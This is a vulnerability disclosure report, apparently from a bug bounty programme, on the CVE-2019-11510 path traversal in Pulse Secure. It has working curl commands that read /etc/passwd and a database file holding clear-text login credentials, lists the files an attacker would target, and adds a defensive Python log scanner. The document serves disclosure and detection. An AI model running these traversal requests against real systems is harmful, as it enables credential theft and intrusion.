Pulse Secure File disclosure, clear text and potential RCE
Critical
U.S. Dept Of Defense
Reported by
alyssa_herrera
Vulnerability Details
Technical details and impact analysis
**Summary:**
Pulse Secure has two main vulnerabilities that allow file disclosure and post-auth RCE.
**Description:**
CVE-2019-11510 is a file disclosure due to normalization issues in Pulse Secure. I was able to reproduce this by grabbing /etc/passwd.
https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#
Though the impact of that alone is very limited (medium to high severity at best), from here we can grab a specific file.
The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear text passwords and usernames once a user logs in; from here we can then access the Pulse Secure instance. I stopped here due to not wanting to break the rules of engagement, but from here I would log in and then use a post-auth exploit.
Here's a list of files that an attacker would instantly hit:
/data/runtime/mtmp/system
/data/runtime/mtmp/lmdb/dataa/data.mdb
/data/runtime/mtmp/lmdb/dataa/lock.mdb
/data/runtime/mtmp/lmdb/randomVal/data.mdb
/data/runtime/mtmp/lmdb/randomVal/lock.mdb
## Impact
Critical
## Step-by-step Reproduction Instructions
We can only do this using curl, because browsers mangle the exploit path.
```
curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#
curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#
curl --path-as-is -k -D- https://███/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#
```
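For defenders, the traversal shape above is easy to spot in web server access logs. The following is an added example, not part of the original report: it parses constructed combined-format log lines, collapses the `..` segments to find which file a request resolves to, and flags hits on the sensitive paths the report lists (IPs are documentation addresses; the log format and the `SENSITIVE_PREFIXES` list are assumptions).

```python
import re
from posixpath import normpath

# Constructed sample lines in combined log format; the first two requests
# mirror the report's curl URLs, the last two are ordinary Pulse traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [20/Aug/2019:10:01:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1821 "-" "curl/7.64.0"
203.0.113.10 - - [20/Aug/2019:10:01:05 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/ HTTP/1.1" 200 65536 "-" "curl/7.64.0"
198.51.100.7 - - [20/Aug/2019:10:02:11 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Aug/2019:10:02:15 +0000] "GET /dana/html5acc/guacamole/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
GUAC_PREFIX = "/dana/html5acc/guacamole/"
# Files the report names as the first things an attacker reaches (assumed list).
SENSITIVE_PREFIXES = ("/etc/passwd", "/data/runtime/mtmp/")


def resolved_traversal(target):
    """Return the absolute file a CVE-2019-11510-style request resolves to,
    or None when the request does not use the guacamole path plus '..'."""
    path = target.split("?", 1)[0]
    if GUAC_PREFIX not in path or "/../" not in path:
        return None
    # normpath collapses the '..' segments; surplus '..' at the root are
    # dropped, which is why /etc/passwd comes out as an absolute path.
    return normpath(path)


def scan_log(text):
    """Return one finding per traversal request: (ip, status, resolved, sensitive)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        resolved = resolved_traversal(m["target"])
        if resolved is None:
            continue
        sensitive = resolved.startswith(SENSITIVE_PREFIXES)
        findings.append((m["ip"], int(m["status"]), resolved, sensitive))
    return findings


if __name__ == "__main__":
    for ip, status, resolved, sensitive in scan_log(SAMPLE_LOG):
        flag = "SENSITIVE" if sensitive else "traversal"
        print(f"{flag}: {ip} got HTTP {status} for {resolved}")
```

A 200 status on a flagged line means the appliance served the file, so an unpatched host that logs such a hit should be treated as compromised, not merely probed.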
## Product, Version, and Configuration (If applicable)
Pulse Secure
## Suggested Mitigation/Remediation Actions
Patch Pulse Secure immediately.
## Impact
An attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user logs in. This also allows an attacker to access highly sensitive internal areas and even perform command execution.
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2019-11510
CRITICAL
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
OS Command Injection